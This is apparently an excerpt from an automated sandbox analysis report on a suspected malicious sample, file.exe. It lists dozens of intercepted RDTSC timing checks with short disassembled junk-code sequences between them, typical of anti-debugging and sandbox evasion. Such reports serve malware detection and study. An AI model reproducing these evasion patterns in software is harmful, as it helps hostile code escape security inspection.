                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3A7C second address: 10D3A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3A80 second address: 10D3A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7EE2 second address: 10D7EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBA5C second address: 10DBA84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6172h 0x00000007 jmp 00007FBD38EF616Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFC03 second address: 10DFC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C782h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFF1D second address: 10DFF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124C44 second address: 1124C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C77Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124C57 second address: 1124C6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6170h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F38 second address: 1124F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F40 second address: 1124F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Fh 0x00000007 jmp 00007FBD38EF6171h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F64 second address: 1124F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3971C784h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F7C second address: 1124F97 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBD38EF6166h 0x00000008 jmp 00007FBD38EF616Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125137 second address: 112513B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11253BF second address: 11253C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11253C4 second address: 11253F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3971C77Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007FBD3971C77Dh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 jc 00007FBD3971C778h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125539 second address: 112553D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112553D second address: 112554F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBD3971C77Ch 0x0000000c jc 00007FBD3971C776h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11256F2 second address: 11256F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11256F6 second address: 112571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C780h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FBD3971C77Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112571A second address: 1125720 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125720 second address: 1125759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3971C784h 0x00000008 jl 00007FBD3971C776h 0x0000000e popad 0x0000000f jmp 00007FBD3971C783h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125759 second address: 112575F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CC1C second address: 112CC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBD3971C776h 0x0000000a jnl 00007FBD3971C776h 0x00000010 popad 0x00000011 push ebx 0x00000012 jnl 00007FBD3971C776h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CC3A second address: 112CC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FBD38EF6166h 0x0000000f jmp 00007FBD38EF616Dh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D093 second address: 112D09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7BF second address: 112E7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7C3 second address: 112E7E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C786h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7E6 second address: 112E7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7EC second address: 112E7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E7F0 second address: 112E815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FBD38EF6168h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E815 second address: 112E81C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E81C second address: 112E831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBD38EF6166h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d js 00007FBD38EF6172h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E831 second address: 112E837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386B8 second address: 11386C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBD38EF6166h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386C3 second address: 11386E5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD3971C78Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386E5 second address: 11386EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11386EE second address: 11386F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113886B second address: 1138871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139FD2 second address: 1139FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 ja 00007FBD3971C778h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FBD3971C782h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD1A second address: 114AD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD1E second address: 114AD46 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBD3971C776h 0x00000008 jmp 00007FBD3971C786h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007FBD3971C778h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F813 second address: 114F84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007FBD38EF6166h 0x00000011 pop edi 0x00000012 push edx 0x00000013 jmp 00007FBD38EF6170h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FBD38EF616Dh 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push edx 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F84F second address: 114F85D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBD3971C776h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F85D second address: 114F863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F863 second address: 114F86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F86C second address: 114F876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBD38EF6166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155974 second address: 115597A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115597A second address: 115597E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115597E second address: 1155992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FBD3971C778h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155992 second address: 1155996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155996 second address: 11559A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A9EE second address: 115A9F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A9F3 second address: 115A9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A9FB second address: 115AA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11614CF second address: 11614D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161AC2 second address: 1161AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD38EF616Dh 0x00000009 popad 0x0000000a jnp 00007FBD38EF6172h 0x00000010 jnp 00007FBD38EF6166h 0x00000016 jg 00007FBD38EF6166h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161EFB second address: 1161EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161EFF second address: 1161F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164F30 second address: 1164F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C781h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jmp 00007FBD3971C780h 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740DE second address: 11740E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740E2 second address: 11740F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C77Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740F7 second address: 11740FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11740FF second address: 1174105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117592F second address: 1175949 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD38EF6166h 0x00000008 jmp 00007FBD38EF6170h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175949 second address: 1175969 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBD3971C782h 0x00000008 jmp 00007FBD3971C77Ah 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007FBD3971C790h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175969 second address: 117596D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117596D second address: 1175971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175971 second address: 117597A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E82 second address: 1176E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBD3971C776h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E8F second address: 1176E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E96 second address: 1176E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E9C second address: 1176EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1183CE4 second address: 1183CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11936C0 second address: 11936C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193DAA second address: 1193DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193DAF second address: 1193DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193F16 second address: 1193F2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD3971C77Eh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193F2B second address: 1193F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBD38EF6194h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FBD38EF6172h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119423C second address: 1194241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11943E2 second address: 1194416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38EF6177h 0x00000009 jmp 00007FBD38EF6179h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194416 second address: 1194441 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C783h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBD3971C77Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11972C7 second address: 11972FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBD38EF6179h 0x0000000d jns 00007FBD38EF6166h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 ja 00007FBD38EF6166h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11972FC second address: 1197301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197301 second address: 119730B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD38EF616Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119735A second address: 1197364 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197364 second address: 119736A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119736A second address: 1197395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, ebx 0x0000000d push 00000004h 0x0000000f jc 00007FBD3971C77Ch 0x00000015 push 40F2DA42h 0x0000001a jp 00007FBD3971C780h 0x00000020 pushad 0x00000021 push esi 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11975FD second address: 1197603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197603 second address: 1197607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197607 second address: 1197621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jne 00007FBD38EF616Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197621 second address: 1197625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197625 second address: 1197650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D37E6h] 0x0000000e mov dword ptr [ebp+122D28B8h], ebx 0x00000014 push dword ptr [ebp+122D1C45h] 0x0000001a mov edx, ecx 0x0000001c call 00007FBD38EF6169h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197650 second address: 119765A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119765A second address: 119765F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BF80 second address: 119BF8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BF8D second address: 119BF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38EF616Bh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BF9F second address: 119BFA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119BFA5 second address: 119BFAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800315 second address: 5800319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
